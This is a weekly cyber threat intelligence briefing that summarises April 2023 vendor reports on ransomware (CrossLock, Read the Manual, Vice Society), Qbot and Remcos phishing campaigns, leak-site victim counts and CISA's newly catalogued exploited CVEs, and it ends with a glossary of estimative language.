Ransomware
New CrossLock Ransomware Discovered
Impacted Industries: All
What You Need To Know:
On 18 April 2023, Cyble reported that they discovered a new ransomware called CrossLock, which uses data-cleaning tactics to hamper recovery efforts. Once loaded, CrossLock performs multiple cleaning tactics on the target’s machine to avoid recovery. There is no information regarding the total number of victims, the industries they operate in, or if the cybercriminals are operating now. Out of an abundance of caution, we’re assuming that all customers fit the adversary’s interest which makes the likelihood of compromise consistent with normal expectations. The impact of this threat will cause significant damage leading to financial loss, proprietary data theft, and disruption in operations due to the deployment of ransomware.
Ransomware
Analysis of “Read the Manual” RaaS
Impacted Industries: All
What You Need To Know:
On 13 April 2023, Trellix reported that they discovered the e-crime group “Read the Manual” is now offering Ransomware-as-a-Service, and forces affiliates to follow a strict ruleset. Their locker uses multi-threading to encrypt logical volumes attached to a machine and can only properly work with administrative privileges. There is no information regarding the total number of victims, the industries they operate in, or if the cybercriminals are operating now. Out of an abundance of caution, we’re assuming that all customers fit the adversary’s interest which makes the likelihood of compromise consistent with normal expectations. The impact of this threat will cause significant damage leading to financial loss, proprietary data theft, and disruption in operations due to the deployment of ransomware.
Ransomware
Vice Society Using Living Off The Land Tactics
Impacted Industries: All
What You Need To Know:
On 13 April 2023, Palo Alto reported that they discovered that the Vice Society ransomware gang used an automated Powershell script to exfiltrate data. Threat actors often use living off the land techniques to evade detection within Windows environments. There is no information regarding the total number of victims, the industries they operate in, or if the cybercriminals are operating now. Out of an abundance of caution, we’re assuming that all customers fit the adversary’s interest which makes the likelihood of compromise consistent with normal expectations. The impact of this threat will cause significant damage leading to financial loss, proprietary data theft, and disruption in operations due to the deployment of ransomware.
Malware
Qbot Operators Use Email Thread Hijacking
Impacted Industries: Financial Services, Education, and Healthcare Industries
What You Need To Know:
On 17 April 2023, Kaspersky reported that they detected Qbot malware delivered through thread hijacked business correspondence emails containing attached PDF files. The malware can extract passwords and cookies, steal messages, intercept traffic, and give operators remote access to the infected system. The cybercriminals can download additional malware, such as Cobalt Strike, to spread the infection throughout the victim’s network. The threat is reported as limited and is operating now, targeting various organizations based in the US in which customers dealing in financial services, banking, education, and healthcare industries fit the adversary’s interest and make the likelihood of compromise consistent with normal expectations, whose impact is will cause a considerable level of damage data breach and theft.
Phishing
RAT Delivered in Tax Day Phishing Campaign
Impacted Industries: Professional Services
What You Need To Know:
On 13 April 2023, Microsoft reported that they detected a phishing campaign themed around tax filing targeting financial services firms. The goal of the campaign is to deliver the Remcos remote access trojan. In some cases, they used GuLoader to execute shellcode which then downloaded Remcos on the target machine. The use of phishing emails themed around tax filing is reported as limited and unlikely to operate now as the tax deadline ended on 18 April. However, the cybercriminals are highly likely expected to switch phishing email themes to deliver the RAT. Various organizations based in the US in which customers dealing with tax preparation, financial services, CPA and accounting firms, and professional service industries fit the adversary’s interest and make the likelihood of compromise consistent, whose impact will cause a considerable level of damage including threat actors gaining remote access to systems and networks.
Phishing
Latest Additions to Data Leak Sites
Impacted Industries: Manufacturing, Information, Other Services, Finance and Insurance, Technical Services
What You Need To Know:
In the past week, monitored ransomware threat groups added 115 victims to their leak sites. Of those listed, 64 are based in the US. The most popular industry listed was manufacturing with 32 victims. They were followed by ten in the information sector, eight each in other services, finance, and insurance, and seven in technical services. This information represents victims whom cybercriminals may have successfully attacked but opted not to negotiate or pay a ransom. However, we can not confirm the validity of the cybercriminals’ claims.
Exploited Vulnerabilities
CISA Adds 5 CVEs to its Known Exploited Vulnerabilities Catalog
Impacted Industries: All
What You Need To Know:
On 13, 17, and 19 April, CISA added five CVEs to its Known Exploited Vulnerabilities Catalog. The CVEs added this week are CVE-2023-29492, CVE-2023-20963, CVE-2023-2033, CVE-2019-8526, CVE-2017-6742. The vulnerabilities affect products from Novi Survey, Android, Google, Apple, and Cisco. CVE-2017-6742 can allow for an authenticated remote attacker to execute code or cause a system to reload on an affected system through a vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE software. ATI recommends the following mitigative action occur according to the mitigation “Due Date” recommended by CISA.
What We Mean When We Say
Estimates of Likelihood
We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.
Confidence in Assessments
Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:
- High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
- Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
- Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.
Share